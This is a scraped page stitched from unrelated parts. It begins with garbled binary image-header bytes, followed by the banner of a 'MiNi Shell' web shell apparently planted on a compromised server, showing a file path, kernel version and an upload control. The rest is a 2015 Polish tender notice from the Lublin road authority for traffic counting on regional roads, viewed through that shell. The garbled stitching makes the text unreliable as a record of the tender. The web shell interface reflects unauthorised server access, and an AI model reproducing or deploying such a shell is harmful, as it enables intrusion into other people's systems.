JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150130/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150130/13213-N-2015.html

<p class="kh_header"><b>Lublin: Wykonanie Generalnego Pomiaru Ruchu na drogach wojewódzkich województwa lubelskiego w 2015 roku.</b><br>
<b>Numer ogłoszenia: 13213 - 2015; data zamieszczenia: 30.01.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Wojewódzkich , ul. Turystyczna 7A, 20-207 Lublin, woj. lubelskie, tel. 081 7495300, faks 081 7495341.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdw.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie Generalnego Pomiaru Ruchu na drogach wojewódzkich województwa lubelskiego w 2015 roku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa polegająca na: wykonaniu Generalnego Pomiaru Ruchu na drogach wojewódzkich województwa lubelskiego w 2015 roku:
Zadanie I - wykonanie pomiarów ruchu na drogach wojewódzkich na obszarze działania RDW w Białej Podlaskiej.
Zadanie II - wykonanie pomiarów ruchu na drogach wojewódzkich na obszarze działania RDW w Chełmie.
Zadanie III - wykonanie pomiarów ruchu na drogach wojewódzkich na obszarze działania RDW w Hrubieszowie.
Zadanie IV - wykonanie pomiarów ruchu na drogach wojewódzkich na obszarze działania RDW w Lublinie z/s w Bychawie.
Zadanie V - wykonanie pomiarów ruchu na drogach wojewódzkich na obszarze działania RDW w Parczewie.
Zadanie VI - wykonanie pomiarów ruchu na drogach wojewódzkich na obszarze działania RDW w Puławach.
Zadanie VII - wykonanie pomiarów ruchu na drogach wojewódzkich na obszarze działania RDW we Włodawie.
Zadanie VIII- wykonanie pomiarów ruchu na drogach wojewódzkich na obszarze działania RDW w Zamościu. 
zgodnie z poniższym opisem:
1.Szczegółowy opis usługi zawarty jest w Instrukcji o sposobie przeprowadzenia Generalnego Pomiaru Ruchu na sieci dróg wojewódzkich województwa lubelskiego w 2015 roku.
2.Wykonawca we własnym zakresie:
a)organizuje stanowiska pomiarowe, tj. zabezpiecza pojazdy samochodowe na czas pomiaru, dowóz obserwatorów na stanowisko i ze stanowiska, wyposażenie obserwatorów w zegarki, przybory do pisania (wraz z zapasowymi), latarki (w czasie pomiaru nocnego), ustawia oznakowanie stanowiska pomiarowego, itp.
b)zapewnia szkolenie obserwatorów w zakresie wykonania pomiarów i sposobu wypełniania formularzy.
3.Właściwy terytorialnie Rejon Dróg Wojewódzkich zapewnia:
a)przygotowanie tabliczek z napisem pomiar ruchu oraz numerem punktu pomiarowego do oznakowania stanowisk pomiarowych,
b) opieczętowane i opisane formularze pomiarowe na wszystkie pomiary.
4.Wykonawca najpóźniej na dwa dni przed terminem pomiaru przedłoży Zamawiającemu (ZDW w Lublinie) wykaz przeszkolonej obsady osobowej każdego punktu pomiarowego oraz do godz. 715 każdego dnia pomiarowego potwierdzi faksem w ZDW rozpoczęcie pomiaru na każdym ze stanowisk pomiarowych.
5.Wykonawca przekaże protokolarnie właściwemu terytorialnie Rejonowi Dróg Wojewódzkich formularze pomiarowe z zapisanymi wynikami pomiaru w terminie do 2 dni po każdym dniu pomiarowym.
6.Rejony Dróg Wojewódzkich przekażą do Zarządu Dróg Wojewódzkich w Lublinie formularze pomiarowe z zapisanymi wynikami pomiaru wraz z protokółami ich odbioru w terminie do 7 dni po każdym dniu pomiarowym.
7.Wyniki pomiarów zebrane na formularzach pomiarowych stanowią własność Zamawiającego.
8.Zamawiający zawiadomi pisemnie Wykonawcę o przyjęciu poprawnie wykonanego każdego z etapów pomiaru lub o konieczności jego powtórzenia zgodnie z pkt.12 niniejszego Opisu przedmiotu zamówienia.
9.Otrzymane od Zamawiającego zawiadomienie o przyjęciu etapu pomiaru stanowi podstawę do wystawienia przez Wykonawcę faktury za ten etap.
10.Zakres ewentualnych poprawek i uzupełnień, które nie mają wpływu na wyniki pomiaru oraz terminy ich usunięcia przez Wykonawcę określone zostaną w wyżej wymienionym zawiadomieniu.
11.Upoważnieni przedstawiciele Zamawiającego, tj. Rejonów Dróg Wojewódzkich i Zarządu Dróg Wojewódzkich w Lublinie mają prawo do przeprowadzenia kontroli prawidłowości przebiegu pomiaru, wyposażenia obserwatorów, prawidłowości zorganizowania i oznakowania stanowisk pomiarowych.
12.W przypadku wystąpienia nieprawidłowości stwierdzonych podczas czynności określonych w pkt. 11, związanych z niezachowaniem szczegółowych warunków z Instrukcji o sposobie przeprowadzenia Generalnego Pomiaru Ruchu na sieci dróg wojewódzkich województwa lubelskiego w 2015 roku i mających wpływ na prawidłowość, rzetelność i wiarygodność wyników pomiaru - Wykonawca wykona pomiary uzupełniające w terminie ustalonym przez Zamawiającego na własny koszt. Niezależnie od powyższego Zamawiający obciąży wykonawcę karą umowną o której mowa w § 6 ust. 1 pkt. 1) wzoru umowy.
13.Szacunkowa wartość przedmiotowego zamówienia wynosi: 355.824,00 zł netto..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 63.71.27.10-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 13.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Warunkiem uczestnictwa w przetargu jest wniesienie wadium w wysokości: 600,00 zł, (słownie złotych: sześćset 00/100)  za każde oferowane do wykonania zadanie. W przypadku oferty na wykonanie więcej niż jednego zadania Wykonawca winien wnieść odpowiednią wielokrotność kwoty 600,00 zł. 
2.Wadium może być wnoszone w jednej lub kilku następujących formach zgodnie z art. 45, ust. 6 ustawy Prawo zamówień publicznych:
1)Pieniądzu;
2)Poręczeniach bankowych lub poręczeniach spółdzielczej kasy  oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)Gwarancjach bankowych;
4)Gwarancjach ubezpieczeniowych;
5)Poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 Nr  42 poz. 275, z późń. zm.).
3.Wadium wnoszone w formie pieniężnej należy wpłacić przelewem na konto ZDW w Lublinie w Banku PKO Bank Polski S.A. nr 74 1020 3147 0000 8002 0105 5730.
4.W ofercie należy złożyć dokument potwierdzający wniesienie wadium.
UWAGA:
1.Wadium w pieniądzu należy wnosić ściśle z dyspozycją art. 45 ust. 7 ustawy Prawo zamówień publicznych, tzn. przelewem na rachunek bankowy wskazany przez zamawiającego. W myśl art. 63. ust. 3 pkt. 1 ustawy Prawo bankowe z dnia 29 sierpnia 1997 (Dz. U z 2012 poz. 1376 z późn. zm.) polecenie przelewu jest jedną z form rozliczenia bezgotówkowego.  Zgodnie z art. 63 c Prawa bankowego polecenie przelewu stanowi udzieloną bankowi dyspozycję dłużnika obciążenia jego rachunku określoną kwotą i uznania tą kwotą rachunku wierzyciela. 
Oznacza to, że wpłata gotówkowa wadium wnoszona na poczcie lub w banku nie stanowi polecenia przelewu w rozumieniu wyżej cytowanych artykułów.
2.Wadium wnoszone przelewem (art. 45 ust. 7 ustawy pzp) uważa się za wniesione 
w terminie jeżeli wpłynie na rachunek bankowy ZDW w Lublinie przed upływem terminu składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. W przetargu mogą wziąć udział Wykonawcy, którzy spełniają warunek dotyczący dysponowania osobami zdolnymi do wykonania zamówienia, to jest minimum jedną osobą dla każdego z Zadań do pełnienia funkcji nadzoru nad realizacją zamówienia oraz osobami, które będą pełnić funkcję obserwatorów, w ilości:
- dla Zadania I 	- minimum 21 osób
- dla zadania II 	- minimum 20 osób
- dla zadania III 	- minimum 18 osób
? dla Zadania IV	- minimum 41 osób
- dla Zadania V 	- minimum 23 osoby
- dla zadania VI 	- minimum 45 osób
- dla Zadania VII 	- minimum 16 osób
- dla Zadania VIII	- minimum 38 osób
2. Zamawiający dokona oceny spełniania warunku udziału polegającego na dysponowaniu osobami zdolnymi do wykonania zamówienia w oparciu o Załącznik Wykaz osób nadzorujących realizację zamówienia z ramienia Wykonawcy. Warunek zostanie uznany za spełniony, gdy wykonawca wykaże dysponowanie (wraz z podstawą do dysponowania) minimum jedną osobą dla każdego z Zadań do pełnienia funkcji nadzoru nad realizacją zamówienia
Warunek dysponowania osobami, które będą pełnić funkcję obserwatorów zostanie uznany za spełniony na podstawie oświadczenia potwierdzającego spełnianie warunków udziału w postępowaniu. W przypadku ubiegania się o więcej niż jedno zadanie Wykonawca winien dysponować sumą liczby osób wymaganych dla wybranych przez siebie Zadań.
 3.W przypadku, gdy Wykonawca polega na wiedzy i doświadczeniu, osobach zdolnych do wykonania zamówienia innych podmiotów - Zamawiający żąda dołączenia do oferty, w szczególności, pisemnego zobowiązania tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia. Przez pisemne zobowiązanie podmiotu trzeciego rozumie się oryginał zobowiązania lub kserokopię zobowiązania poświadczoną, za zgodność 
z oryginałem przez ten podmiot (zgodnie z wyrokami KIO nr; KIO 786/11, KIO 787/11, KIO 797/11, KIO 830/11, KIO 1008/11)  
UWAGA! Zobowiązanie podmiotu trzeciego do oddania Wykonawcy do dyspozycji niezbędnych zasobów winno posiadać formę pisemną, stosowną treść, z której będzie wynikało, że podmiot ten zobowiązał się do udostępnienia określonych zasobów na okres korzystania z nich przy wykonaniu zamówienia oraz dla swej skuteczności musi zostać złożone przez osobę/osoby uprawnione do reprezentowania podmiotu trzeciego w powyższym zakresie. Zobowiązanie złożone przez osobę nieuprawnioną nie dowodzi udostępnienia zasobu przez podmiot trzeci.(Zgodnie z wyrokiem KIO2213/11).
4. Zgodnie z § 1 ust. 6 pkt 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. 2013, poz. 231), jeżeli wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, zamawiający w celu oceny, czy wykonawca będzie dysponował zasobami innych podmiotów 
w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, może żądać: dokumentów dotyczących w szczególności:
a)zakresu dostępnych wykonawcy zasobów innego podmiotu,
b)sposobu wykorzystania  zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia,
c)charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem,
d) zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.
5. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia w/w warunek udziału może być spełniony łącznie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto, oprócz oświadczeń lub dokumentów, jakich należy dostarczyć w celu potwierdzenia spełniania warunków udziału, Wykonawca obowiązany jest dołączyć do oferty:
1)Dowód wniesienia wadium.
2)Ofertę przetargową (z ceną netto i z podatkiem VAT) 
3)W przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia, do oferty należy załączyć dokument (np. odpowiednią umowę) ustanawiający pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego zgodnie z art. 23 ust. 1 i 2 ustawy Prawo zamówień publicznych.
4)W przypadku podpisania oferty i innych dokumentów przez osobę/osoby, które nie są wymienione w odpisie z właściwego rejestru do oferty należy załączyć dokument potwierdzający prawo do reprezentowania podmiotu przez osobę/osoby podpisujące ofertę.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ustawy Prawo zamówień publicznych przewiduje możliwość dokonania zmian postanowień zawartej Umowy w stosunku do treści oferty, polegających na:
1.  zmianie wynagrodzenia umowy w przypadku, gdy zmianie uległy stawki podatku VAT - wynagrodzenie, ulegnie zmianie w ten sposób, że wynagrodzenie netto pozostanie takie samo, a wartość podatku VAT i wynagrodzenie brutto ulegną zmianie.
2. zmianie podwykonawcy - podmiotu, na którego zasoby Wykonawca powoływał się w złożonej ofercie, na zasadach określonych w art. 26 ust. 2b ustawy pzp, w celu wykazania spełniania warunków udziału w postępowaniu - w przypadku akceptacji przez Zamawiającego wskazanego innego podwykonawcy po wykazaniu, iż proponowany inny podwykonawca  spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.
3. rezygnacji z podwykonawcy - podmiotu, na którego zasoby Wykonawca powoływał się w złożonej ofercie, na zasadach określonych w art. 26 ust. 2b ustawy pzp, w celu wykazania spełniania warunków udziału w postępowaniu - w przypadku wykazania Zamawiającemu, iż Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.
4. powierzeniu podwykonawcy realizacji części zamówienia - w przypadku, gdy Wykonawca w ofercie nie wskazał części, którą na etapie realizacji zamówienia zamierza powierzyć podwykonawcy; w takim przypadku wykonawca winien stosować zasady wynikające z § 8 ust.1-5 umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zdw.bip.lubelskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację Istotnych Warunków Zamówienia można odebrać w siedzibie Zamawiającego, lok. 203, lub pocztą elektroniczną po wcześniejszym przesłaniu zamówienia na adres:dzp@zdw.lublin.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.02.2015 godzina 10:00, miejsce: Zarząd Dróg Wojewódzkich w Lublinie, ul. Turystyczna 7a, pok. 107. Otwarcie ofert nastąpi w dniu 12.02.2015 r. o godz.10:30 w pok. 208.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> I. Informacje o sposobie porozumiewania się zamawiającego z wykonawcami a także wskazanie osób uprawnionych do porozumiewania się z wykonawcami 	
1. Oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazują za pomocą faksu nr (81) 749-53-41; (81) 749-53-77 lub drogą elektroniczną na adres e-mail: dzp@zdw.lublin.pl.
2. Jeżeli Zamawiający lub Wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje faksem lub drogą elektroniczną, każda ze stron na żądanie drugiej niezwłocznie potwierdza fakt ich otrzymania.
Osoby uprawnione do porozumiewania się z wykonawcami: 
1)  W zakresie przedmiotu zamówienia - Wydział Inżynierii Ruchu, Tadeusz Bień, tel. (81) 749-53-16, w zastępstwie Andrzej Bender, tel. (81) 749-53-17.  
2)  W sprawach formalno-prawnych związanych z postępowaniem o udzielenie zamówienia i zawarciem umowy - Wydział Umów, Renata Bieńko, tel. (81) 749-53-29.
UWAGA: Wykonawcy, którzy uzyskają niniejszą specyfikację ze strony internetowej zamawiającego lub w inny sposób i zamierzają ubiegać się o udzielenie zamówienia, proszeni są o przesłanie krótkiej informacji (faksem 81 749-53-41 lub pocztą elektroniczną na adres sekretariat@zdw.lublin.pl) zawierającej podstawowe dane firmy (nazwa, adres, numer tel. i faksu, adres poczty elektronicznej). Wykonawcy, którzy zgłoszą w ten sposób zamiar ubiegania się o udzielenie zamówienia będą przez Zamawiającego indywidualnie (bezpośrednio) zawiadamiani o np.: zapytaniach, wyjaśnieniach i zmianach dotyczących specyfikacji istotnych warunków zamówienia, zwołaniu przez Zamawiającego zebrania wszystkich wykonawców, przedłużeniu terminu składania ofert.
II. Zamawiający wykluczy z postępowania o udzielenie zamówienia wykonawcę, który w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszył obowiązki zawodowe, w szczególności, gdy wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co zamawiający jest w stanie wykazać za pomocą dowolnych środków dowodowych, Zamawiający nie wykluczy z postępowania o udzielenie zamówienia wykonawcy, który udowodni, że podjął konkretne środki techniczne, organizacyjne i kadrowe, które mają zapobiec zawinionemu i poważnemu naruszaniu obowiązków zawodowych w przyszłości oraz naprawił szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązał się do ich naprawienia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie Generalnego Pomiaru Ruchu na drogach wojewódzkich województwa lubelskiego w 2015 roku:
Zadanie I - wykonanie pomiarów ruchu na drogach wojewódzkich na obszarze działania RDW w Białej Podlaskiej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie I - wykonanie pomiarów ruchu na drogach wojewódzkich na obszarze działania RDW w Białej Podlaskiej.
Szczegółowy opis usługi zawarty jest w Instrukcji o sposobie przeprowadzenia Generalnego Pomiaru Ruchu na sieci dróg wojewódzkich województwa lubelskiego w 2015 roku.
Szacunkowa wartość Zadania I wynosi: 32.688,00 zł netto.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 63.71.27.10-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 13.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonanie Generalnego Pomiaru Ruchu na drogach wojewódzkich województwa lubelskiego w 2015 roku:
Zadanie II - wykonanie pomiarów ruchu na drogach wojewódzkich na obszarze działania RDW w Chełmie..</p>
